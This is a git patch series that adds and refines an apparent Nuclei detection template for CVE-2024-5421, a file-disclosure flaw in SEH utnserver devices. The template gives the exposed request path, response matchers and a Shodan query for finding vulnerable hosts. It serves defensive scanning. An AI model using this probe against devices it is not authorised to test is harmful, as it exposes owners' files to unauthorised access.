From 11a5d1e686a678cfa1cd04f856d7b0075f82456f Mon Sep 17 00:00:00 2001
From: Parshva87 <bhojakparshva1234@gmail.com>
Date: Wed, 14 Aug 2024 21:05:30 -0400
Subject: [PATCH 1/4] Added CVE-2024-5421 Template

---
 http/cves/2024/CVE-2024-5421.yaml | 43 +++++++++++++++++++++++++++++++
 1 file changed, 43 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-5421.yaml

diff --git a/http/cves/2024/CVE-2024-5421.yaml b/http/cves/2024/CVE-2024-5421.yaml
new file mode 100644
index 00000000000..f0b8cf974ab
--- /dev/null
+++ b/http/cves/2024/CVE-2024-5421.yaml
@@ -0,0 +1,43 @@
+id: CVE-2024-5421
+
+info:
+  name: SEH utnserver Pro/ProMAX / INU-100 20.1.22 - Authenticated File Disclosure  
+  author: bl4ckp4r4d1s3
+  severity: high
+  description: |
+    A vulnerability was identified in utnserver Pro, utnserver ProMAX, and INU-100 version 20.1.22 and earlier, impacting the file handling functions. This flaw results in authenticated file disclosure, granting unauthorized access to sensitive files and directories. Although authentication is required, the vulnerability poses a significant risk of data exposure. This vulnerability is publicly disclosed and identified as CVE-2024-5421.
+  reference:
+    - https://cyberdanube.com/en/en-multiple-vulnerabilities-in-seh-untserver-pro/index.html
+    - https://seclists.org/fulldisclosure/2024/Jun/4
+  classification:
+    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:L
+    cvss-score: 8.7
+    cve-id: CVE-2024-5421
+    cwe-id: CWE-78
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: SEH HTTP Server
+    vendor: SEH Computertechnik
+    product: utnserver Pro/ProMAX / INU-100
+    version: 0 - 20.1.22
+  tags: cve,cve2024,utnserver,os command
+
+http:
+  - method: GET
+    path: 
+      - "{{BaseURL}}/info/dir?/"
+
+    matchers:
+      - type: word
+        name: Authenticated File Disclosure
+        words:
+          - "application"
+          - "dev"
+          - "etc"
+        part: body
+
+      - type: status
+        status:
+          - 200
+

From 00324ae7077eb5859f124f9395d408e7df89a0ab Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 16 Aug 2024 10:51:45 +0400
Subject: [PATCH 2/4] updated FN matchers

---
 http/cves/2024/CVE-2024-5421.yaml | 18 +++++++++---------
 1 file changed, 9 insertions(+), 9 deletions(-)

diff --git a/http/cves/2024/CVE-2024-5421.yaml b/http/cves/2024/CVE-2024-5421.yaml
index f0b8cf974ab..bba3cda9b0e 100644
--- a/http/cves/2024/CVE-2024-5421.yaml
+++ b/http/cves/2024/CVE-2024-5421.yaml
@@ -1,7 +1,7 @@
 id: CVE-2024-5421
 
 info:
-  name: SEH utnserver Pro/ProMAX / INU-100 20.1.22 - Authenticated File Disclosure  
+  name: SEH utnserver Pro/ProMAX / INU-100 20.1.22 - File Exposure
   author: bl4ckp4r4d1s3
   severity: high
   description: |
@@ -9,6 +9,7 @@ info:
   reference:
     - https://cyberdanube.com/en/en-multiple-vulnerabilities-in-seh-untserver-pro/index.html
     - https://seclists.org/fulldisclosure/2024/Jun/4
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-5421
   classification:
     cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:L
     cvss-score: 8.7
@@ -20,24 +21,23 @@ info:
     shodan-query: SEH HTTP Server
     vendor: SEH Computertechnik
     product: utnserver Pro/ProMAX / INU-100
-    version: 0 - 20.1.22
-  tags: cve,cve2024,utnserver,os command
+  tags: cve,cve2024,utnserver,seh,exposure
 
 http:
   - method: GET
     path: 
       - "{{BaseURL}}/info/dir?/"
 
+    matchers-condition: and
     matchers:
       - type: word
-        name: Authenticated File Disclosure
-        words:
-          - "application"
-          - "dev"
-          - "etc"
         part: body
+        words:
+          - "/var/tmp</td>"
+          - "File System Info"
+          - 'face="courier'
+        condition: and
 
       - type: status
         status:
           - 200
-

From 82b9e2000573ef30f614493b82e20ea30c140fb4 Mon Sep 17 00:00:00 2001
From: Parshva <55111077+Parshva87@users.noreply.github.com>
Date: Fri, 16 Aug 2024 08:09:24 -0400
Subject: [PATCH 3/4] Update CVE-2024-5421.yaml

removed trailing spaces at line 28
---
 http/cves/2024/CVE-2024-5421.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/cves/2024/CVE-2024-5421.yaml b/http/cves/2024/CVE-2024-5421.yaml
index bba3cda9b0e..caa5bb6a64c 100644
--- a/http/cves/2024/CVE-2024-5421.yaml
+++ b/http/cves/2024/CVE-2024-5421.yaml
@@ -25,7 +25,7 @@ info:
 
 http:
   - method: GET
-    path: 
+    path:
       - "{{BaseURL}}/info/dir?/"
 
     matchers-condition: and

From c7eb2f1083744e78132a58169549f69f98c1e1ec Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Sat, 17 Aug 2024 11:05:29 +0530
Subject: [PATCH 4/4] minorupdate

---
 http/cves/2024/CVE-2024-5421.yaml | 6 ++----
 1 file changed, 2 insertions(+), 4 deletions(-)

diff --git a/http/cves/2024/CVE-2024-5421.yaml b/http/cves/2024/CVE-2024-5421.yaml
index caa5bb6a64c..59d75b49ec6 100644
--- a/http/cves/2024/CVE-2024-5421.yaml
+++ b/http/cves/2024/CVE-2024-5421.yaml
@@ -1,7 +1,7 @@
 id: CVE-2024-5421
 
 info:
-  name: SEH utnserver Pro/ProMAX / INU-100 20.1.22 - File Exposure
+  name: SEH utnserver Pro/ProMAX/INU-100 20.1.22 - File Exposure
   author: bl4ckp4r4d1s3
   severity: high
   description: |
@@ -18,9 +18,7 @@ info:
   metadata:
     verified: true
     max-request: 1
-    shodan-query: SEH HTTP Server
-    vendor: SEH Computertechnik
-    product: utnserver Pro/ProMAX / INU-100
+    shodan-query: "SEH HTTP Server"
   tags: cve,cve2024,utnserver,seh,exposure
 
 http: